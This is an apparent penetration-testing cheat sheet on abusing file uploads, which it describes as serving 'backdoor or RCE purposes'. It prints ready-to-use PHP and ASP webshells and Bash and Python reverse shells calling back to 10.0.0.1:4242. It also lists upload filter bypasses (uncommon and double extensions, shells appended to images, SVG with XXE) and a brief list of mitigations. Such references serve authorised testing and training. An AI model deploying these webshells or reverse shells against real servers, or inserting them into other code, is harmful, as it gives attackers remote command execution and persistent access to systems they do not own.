search

File Uploads

Ways to upload files to a server for backdoor or RCE purposes

hashtag
Basic Webshell Uploads

PHP RCE

<?php system('hostname'); ?>

PHP Webshell

<?php system($_REQUEST['cmd']); ?>

ASP Web Shell

<% eval request('cmd') %>

hashtag
Basic Reverse shells

Bash TCP

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Python3

import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.mdarrow-up-right

hashtag
Extension Bypassing

Uncommon extensions (Can be fuzzed)

shell.phtml

Case Manipulation

Double Extension / Reverse Double Extension

hashtag
Shells in Images

Create an empty image with

Upload the image and intercept it with BurpSuite. Append the shell at the end

Checks are typically done on

  • Extension names

  • Content types

  • Mime types

Play around with those to find a bypass

hashtag
SVG files and XXE

An SVG file contains XML code, which can be chained with XXE vulnerabilities

hashtag
Mitigations

  • Extension Validation

  • Content Type Validation

  • Mime Type Validation

  • Prevent upload path disclosure

PreviousInstallationNextFile Transfers

Last updated